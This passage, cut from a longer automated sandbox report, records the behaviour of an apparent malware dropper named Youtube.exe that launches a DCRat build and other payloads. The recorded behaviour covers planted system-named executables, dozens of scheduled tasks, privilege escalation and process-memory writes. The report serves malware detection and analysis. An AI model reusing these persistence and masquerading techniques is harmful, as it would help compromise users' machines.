Files\nodejs\node_modules\npm\node_modules\diff\lib\index.mjs msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\brace-expansion\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\lib\dir.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\translations\en.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\util\encoding.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\fastest-levenshtein\LICENSE.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\audit.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\readable-stream\errors-browser.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tiny-relative-date\src\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cmd-shim\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\styles.js msiexec.exe File created C:\Program Files\nodejs\node_modules\corepack\shims\nodewin\npm.ps1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\README.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\commands\ci.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\p-map\license msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\lib\workspaces\update-workspaces.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-repo.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\bin\node-gyp.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\installed-package-contents\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\tlog\verify\body.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\build\common\helpers.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@tootallnate\once\dist\types.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\make-fetch-happen\lib\cache\policy.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\unique-filename\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\LICENSE-MIT msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\inc.js msiexec.exe -
Drops file in Windows directory 34 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF47CE9A4BBDC55819.TMP msiexec.exe File created C:\Windows\Installer\e57c11d.msi msiexec.exe File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} msiexec.exe File created C:\Windows\Web\Wallpaper\Windows\wscript.exe ComContainerbrowserRefRuntime.exe File opened for modification C:\Windows\Installer\MSID843.tmp msiexec.exe File created C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSI54CB.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF55B22294D6ABB9D2.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFD86BC634B1D20DAD.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSICBBC.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF35FAEF32B22AFAED.TMP msiexec.exe File created C:\Windows\LiveKernelReports\conhost.exe ComContainerbrowserRefRuntime.exe File opened for modification C:\Windows\LiveKernelReports\conhost.exe ComContainerbrowserRefRuntime.exe File opened for modification C:\Windows\Installer\MSI543E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICC3A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICC7A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEBCE.tmp msiexec.exe File created C:\Windows\Installer\e57c121.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID863.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIEB9E.tmp msiexec.exe File created C:\Windows\LiveKernelReports\088424020bedd6 ComContainerbrowserRefRuntime.exe File created \??\c:\Windows\IdentityCRL\INT\CSCFB022689F64F454281863A9528E616A9.TMP csc.exe File created \??\c:\Windows\IdentityCRL\INT\backgroundTaskHost.exe csc.exe File opened for modification C:\Windows\Installer\MSI575D.tmp msiexec.exe File created C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe Refcrt.exe File created C:\Windows\IdentityCRL\INT\eddb19405b7ce1 Refcrt.exe File opened for modification C:\Windows\Installer\e57c11d.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID302.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5662.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Web\Wallpaper\Windows\817c8c8ec737a7 ComContainerbrowserRefRuntime.exe File opened for modification C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedgewebview2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedgewebview2.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe -
Modifies registry class 35 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings Frage build.exe Key created \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings Roblox.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings ComContainerbrowserRefRuntime.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings DCRatBuild.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-3766757357-1293853516-507035944-1000_Classes\Local Settings solara.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 886242.crdownload:SmartScreen msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 37 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1384 schtasks.exe 2800 schtasks.exe 988 schtasks.exe 1080 schtasks.exe 3948 schtasks.exe 4116 schtasks.exe 2844 schtasks.exe 5272 schtasks.exe 2276 schtasks.exe 2320 schtasks.exe 3352 schtasks.exe 5996 schtasks.exe 5152 schtasks.exe 1916 schtasks.exe 2556 schtasks.exe 4464 schtasks.exe 4568 schtasks.exe 6116 schtasks.exe 236 schtasks.exe 2020 schtasks.exe 5004 schtasks.exe 4832 schtasks.exe 2476 schtasks.exe 4520 schtasks.exe 1440 schtasks.exe 688 schtasks.exe 2180 schtasks.exe 848 schtasks.exe 2788 schtasks.exe 4864 schtasks.exe 3360 schtasks.exe 3740 schtasks.exe 1712 schtasks.exe 3572 schtasks.exe 4632 schtasks.exe 2064 schtasks.exe 2692 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4884 SolaraBootstrapper.exe 4884 SolaraBootstrapper.exe 2944 Refcrt.exe 2944 Refcrt.exe 2944 Refcrt.exe 2944 Refcrt.exe 1260 powershell.exe 1260 powershell.exe 1880 powershell.exe 1880 powershell.exe 1528 powershell.exe 1528 powershell.exe 2232 powershell.exe 2232 powershell.exe 4504 powershell.exe 4504 powershell.exe 5072 powershell.exe 5072 powershell.exe 5016 powershell.exe 5016 powershell.exe 2588 powershell.exe 2588 powershell.exe 2240 powershell.exe 2240 powershell.exe 5108 powershell.exe 5108 powershell.exe 4860 powershell.exe 4860 powershell.exe 4504 powershell.exe 2240 powershell.exe 988 Registry.exe 988 Registry.exe 1260 powershell.exe 1528 powershell.exe 5072 powershell.exe 2232 powershell.exe 1880 powershell.exe 5016 powershell.exe 2588 powershell.exe 4860 powershell.exe 5108 powershell.exe 988 Registry.exe 2244 msiexec.exe 2244 msiexec.exe 5868 conhost.exe 5964 powershell.exe 5964 powershell.exe 5964 powershell.exe 776 powershell.exe 776 powershell.exe 776 powershell.exe 988 Registry.exe 988 Registry.exe 988 Registry.exe 988 Registry.exe 988 Registry.exe 988 Registry.exe 988 Registry.exe 988 Registry.exe 5180 ComContainerbrowserRefRuntime.exe 5180 ComContainerbrowserRefRuntime.exe 5180 ComContainerbrowserRefRuntime.exe 5180 ComContainerbrowserRefRuntime.exe 5180 ComContainerbrowserRefRuntime.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 988 Registry.exe 5764 conhost.exe 5744 msiexec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 5676 msedge.exe 5676 msedge.exe 5772 msedgewebview2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4884 SolaraBootstrapper.exe Token: SeDebugPrivilege 2944 Refcrt.exe Token: SeShutdownPrivilege 276 msiexec.exe Token: SeIncreaseQuotaPrivilege 276 msiexec.exe Token: SeSecurityPrivilege 2244 msiexec.exe Token: SeCreateTokenPrivilege 276 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 276 msiexec.exe Token: SeLockMemoryPrivilege 276 msiexec.exe Token: SeIncreaseQuotaPrivilege 276 msiexec.exe Token: SeMachineAccountPrivilege 276 msiexec.exe Token: SeTcbPrivilege 276 msiexec.exe Token: SeSecurityPrivilege 276 msiexec.exe Token: SeTakeOwnershipPrivilege 276 msiexec.exe Token: SeLoadDriverPrivilege 276 msiexec.exe Token: SeSystemProfilePrivilege 276 msiexec.exe Token: SeSystemtimePrivilege 276 msiexec.exe Token: SeProfSingleProcessPrivilege 276 msiexec.exe Token: SeIncBasePriorityPrivilege 276 msiexec.exe Token: SeCreatePagefilePrivilege 276 msiexec.exe Token: SeCreatePermanentPrivilege 276 msiexec.exe Token: SeBackupPrivilege 276 msiexec.exe Token: SeRestorePrivilege 276 msiexec.exe Token: SeShutdownPrivilege 276 msiexec.exe Token: SeDebugPrivilege 276 msiexec.exe Token: SeAuditPrivilege 276 msiexec.exe Token: SeSystemEnvironmentPrivilege 276 msiexec.exe Token: SeChangeNotifyPrivilege 276 msiexec.exe Token: SeRemoteShutdownPrivilege 276 msiexec.exe Token: SeUndockPrivilege 276 msiexec.exe Token: SeSyncAgentPrivilege 276 msiexec.exe Token: SeEnableDelegationPrivilege 276 msiexec.exe Token: SeManageVolumePrivilege 276 msiexec.exe Token: SeImpersonatePrivilege 276 msiexec.exe Token: SeCreateGlobalPrivilege 276 msiexec.exe Token: SeRestorePrivilege 2244 msiexec.exe Token: SeTakeOwnershipPrivilege 2244 msiexec.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeDebugPrivilege 1880 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 2232 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 5072 powershell.exe Token: SeDebugPrivilege 5016 powershell.exe Token: SeDebugPrivilege 2588 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeDebugPrivilege 4860 powershell.exe Token: SeDebugPrivilege 988 Registry.exe Token: SeRestorePrivilege 2244 msiexec.exe Token: SeTakeOwnershipPrivilege 2244 msiexec.exe Token: SeRestorePrivilege 2244 msiexec.exe Token: SeTakeOwnershipPrivilege 2244 msiexec.exe Token: SeRestorePrivilege 2244 msiexec.exe Token: SeTakeOwnershipPrivilege 2244 msiexec.exe Token: SeRestorePrivilege 2244 msiexec.exe Token: SeTakeOwnershipPrivilege 2244 msiexec.exe Token: SeRestorePrivilege 2244 msiexec.exe Token: SeTakeOwnershipPrivilege 2244 msiexec.exe Token: SeRestorePrivilege 2244 msiexec.exe Token: SeTakeOwnershipPrivilege 2244 msiexec.exe Token: SeDebugPrivilege 5868 conhost.exe Token: SeDebugPrivilege 5964 powershell.exe Token: SeDebugPrivilege 776 powershell.exe Token: SeDebugPrivilege 5180 ComContainerbrowserRefRuntime.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe 5676 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3440 wrote to memory of 4352 3440 Youtube.exe 82 PID 3440 wrote to memory of 4352 3440 Youtube.exe 82 PID 3440 wrote to memory of 4352 3440 Youtube.exe 82 PID 3440 wrote to memory of 2756 3440 Youtube.exe 83 PID 3440 wrote to memory of 2756 3440 Youtube.exe 83 PID 3440 wrote to memory of 2756 3440 Youtube.exe 83 PID 3440 wrote to memory of 976 3440 Youtube.exe 84 PID 3440 wrote to memory of 976 3440 Youtube.exe 84 PID 3440 wrote to memory of 1592 3440 Youtube.exe 85 PID 3440 wrote to memory of 1592 3440 Youtube.exe 85 PID 3440 wrote to memory of 1592 3440 Youtube.exe 85 PID 4352 wrote to memory of 4884 4352 Result.exe 86 PID 4352 wrote to memory of 4884 4352 Result.exe 86 PID 4352 wrote to memory of 4884 4352 Result.exe 86 PID 2756 wrote to memory of 4576 2756 DCRatBuild.exe 88 PID 2756 wrote to memory of 4576 2756 DCRatBuild.exe 88 PID 2756 wrote to memory of 4576 2756 DCRatBuild.exe 88 PID 1592 wrote to memory of 1236 1592 Frage build.exe 89 PID 1592 wrote to memory of 1236 1592 Frage build.exe 89 PID 1592 wrote to memory of 1236 1592 Frage build.exe 89 PID 4352 wrote to memory of 2680 4352 Result.exe 90 PID 4352 wrote to memory of 2680 4352 Result.exe 90 PID 4352 wrote to memory of 2680 4352 Result.exe 90 PID 2680 wrote to memory of 2948 2680 solara.exe 91 PID 2680 wrote to memory of 2948 2680 solara.exe 91 PID 2680 wrote to memory of 2948 2680 solara.exe 91 PID 2948 wrote to memory of 4192 2948 WScript.exe 92 PID 2948 wrote to memory of 4192 2948 WScript.exe 92 PID 2948 wrote to memory of 4192 2948 WScript.exe 92 PID 4192 wrote to memory of 2944 4192 cmd.exe 94 PID 4192 wrote to memory of 2944 4192 cmd.exe 94 PID 4884 wrote to memory of 276 4884 SolaraBootstrapper.exe 119 PID 4884 wrote to memory of 276 4884 SolaraBootstrapper.exe 119 PID 4884 wrote to memory of 276 4884 SolaraBootstrapper.exe 119 PID 2944 wrote to memory of 1880 2944 Refcrt.exe 129 PID 2944 wrote to memory of 1880 2944 Refcrt.exe 129 PID 2944 wrote to memory of 1260 2944 Refcrt.exe 130 PID 2944 wrote to memory of 1260 2944 Refcrt.exe 130 PID 2944 wrote to memory of 5072 2944 Refcrt.exe 131 PID 2944 wrote to memory of 5072 2944 Refcrt.exe 131 PID 2944 wrote to memory of 2588 2944 Refcrt.exe 132 PID 2944 wrote to memory of 2588 2944 Refcrt.exe 132 PID 2944 wrote to memory of 5016 2944 Refcrt.exe 133 PID 2944 wrote to memory of 5016 2944 Refcrt.exe 133 PID 2944 wrote to memory of 1528 2944 Refcrt.exe 134 PID 2944 wrote to memory of 1528 2944 Refcrt.exe 134 PID 2944 wrote to memory of 2232 2944 Refcrt.exe 135 PID 2944 wrote to memory of 2232 2944 Refcrt.exe 135 PID 2944 wrote to memory of 4504 2944 Refcrt.exe 136 PID 2944 wrote to memory of 4504 2944 Refcrt.exe 136 PID 2944 wrote to memory of 4860 2944 Refcrt.exe 137 PID 2944 wrote to memory of 4860 2944 Refcrt.exe 137 PID 2944 wrote to memory of 5108 2944 Refcrt.exe 138 PID 2944 wrote to memory of 5108 2944 Refcrt.exe 138 PID 2944 wrote to memory of 2240 2944 Refcrt.exe 139 PID 2944 wrote to memory of 2240 2944 Refcrt.exe 139 PID 2944 wrote to memory of 988 2944 Refcrt.exe 151 PID 2944 wrote to memory of 988 2944 Refcrt.exe 151 PID 2244 wrote to memory of 5196 2244 msiexec.exe 154 PID 2244 wrote to memory of 5196 2244 msiexec.exe 154 PID 2244 wrote to memory of 5364 2244 msiexec.exe 155 PID 2244 wrote to memory of 5364 2244 msiexec.exe 155 PID 2244 wrote to memory of 5364 2244 msiexec.exe 155 PID 976 wrote to memory of 5868 976 Bloxstrap.exe 160 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Youtube.exe"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Users\Admin\AppData\Local\Temp\Result.exe"C:\Users\Admin\AppData\Local\Temp\Result.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\msiexec.exe"msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn4⤵
- Suspicious use of AdjustPrivilegeToken
PID:276
-
-
C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe"C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart4⤵
- Executes dropped EXE
PID:5808 -
C:\Windows\Temp\{364DCF21-CB4A-412B-A23B-C423CF6B2422}\.cr\vc_redist.x64.exe"C:\Windows\Temp\{364DCF21-CB4A-412B-A23B-C423CF6B2422}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=564 -burn.filehandle.self=688 /install /quiet /norestart5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3568
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe4⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5676 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe98b73cb8,0x7ffe98b73cc8,0x7ffe98b73cd85⤵PID:5388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1860 /prefetch:25⤵PID:2792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1920 /prefetch:35⤵PID:4312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 /prefetch:85⤵PID:2800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:15⤵PID:2232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:15⤵PID:6068
-
-
